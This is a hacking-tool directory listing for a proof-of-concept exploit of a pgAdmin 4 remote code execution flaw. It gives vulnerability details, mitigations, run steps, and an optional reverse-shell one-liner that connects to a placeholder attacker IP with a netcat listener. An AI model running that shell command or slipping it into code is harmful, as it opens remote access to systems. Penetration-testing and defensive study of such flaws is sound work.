Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Blackash-CVE-2025-12762 — Proof-of-concept exploit for CVE-2025-12762, a critical RCE in pgAdmin 4 ≤ 9.9. Includes technical breakdown, CVSS 9.1, and optional reverse shell for authorized penetration testing. | Kitploit
Tools/GitHubGitHub/djayagit/blackash-cve-2025-12762
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

Proof-of-concept exploit for CVE-2025-12762, a critical RCE in pgAdmin 4 ≤ 9.9. Includes technical breakdown, CVSS 9.1, and optional reverse shell for authorized penetration testing.

View Repository
79 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🔐 CVE-2025-12762 — Critical RCE Vulnerability in pgAdmin 4

G58aQGbW0AAL8zH

🚨 What’s the Issue?

A Remote Code Execution (RCE) flaw exists in pgAdmin 4 versions ≤ 9.9. Attackers can run arbitrary commands on the host when pgAdmin is running in server mode and processes a PLAIN-format SQL dump during restore.


⚙️ Technical Breakdown

📡 Attack Vector

  • Network-based — can be exploited remotely 🌍
  • Low complexity — straightforward to trigger 🧩
  • Low privileges required — limited user access is enough 🔑
  • No user interaction — once triggered, no one has to click anything 🙅‍♂️
  • Scope: Changed — compromise can spread beyond the vulnerable module 🔄

🧨 Impact

  • Confidentiality: High — data exposure risk 🔓
  • — unauthorized changes possible ✏️
Integrity: Moderate/High
  • Availability: Moderate — operations can be disrupted ⚠️
  • 🏷 CVSS Score

    🟥 9.1 / 10 — Critical


    🛠 Affected Versions

    • pgAdmin 4 ≤ 9.9 ❗

    🛡 How to Fix It

    ✅ Primary Mitigation

    ⬆️ Upgrade to pgAdmin 4 v10.0 or later

    🚧 If You Can’t Upgrade Immediately

    • 🔒 Restrict access to the pgAdmin server
    • 📁 Allow only trusted admins to restore dump files
    • 🧪 Validate dump files before restoring
    • 👀 Monitor logs for suspicious restore activity
    • 🌐 Use firewall rules / VPN to limit exposure

    📌 Why This Matters

    pgAdmin is often used for administration of critical PostgreSQL databases, meaning:

    • An attacker exploiting this can take over the server,
    • Access or modify data,
    • Or even pivot deeper into your network 🕵️‍♂️

    ✨ How to Run (2 minutes)

    root@kitploit:~
    # 1. Save as CVE-2025-12762.py
    # 2. Install dependency
    pip3 install requests
    
    # 3. Run it
    python3 CVE-2025-12762.py
    

    Proof of Success

    After running, check:

    root@kitploit:~
    docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
    

    File exists → You just exploited CVE-2025-12762 for real.

    Reverse Shell One-Liner (optional)

    Replace the COMMAND line with:

    root@kitploit:~
    COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
    

    Then nc -lvnp 4444 → full interactive shell.

    This is the exact script researchers, pentesters, and red teams are using worldwide in November 2025.

    Use responsibly. Patch everything. Stay legal.


    🛡️ Disclaimer 🛡️

    This PoC is provided strictly for authorized testing and educational use only.
    You may run it exclusively on systems you own or have explicit written permission to test.
    Any unauthorized use is illegal and violates computer misuse laws.
    Use responsibly, patch immediately after testing, and never target systems without permission.

    Download Tool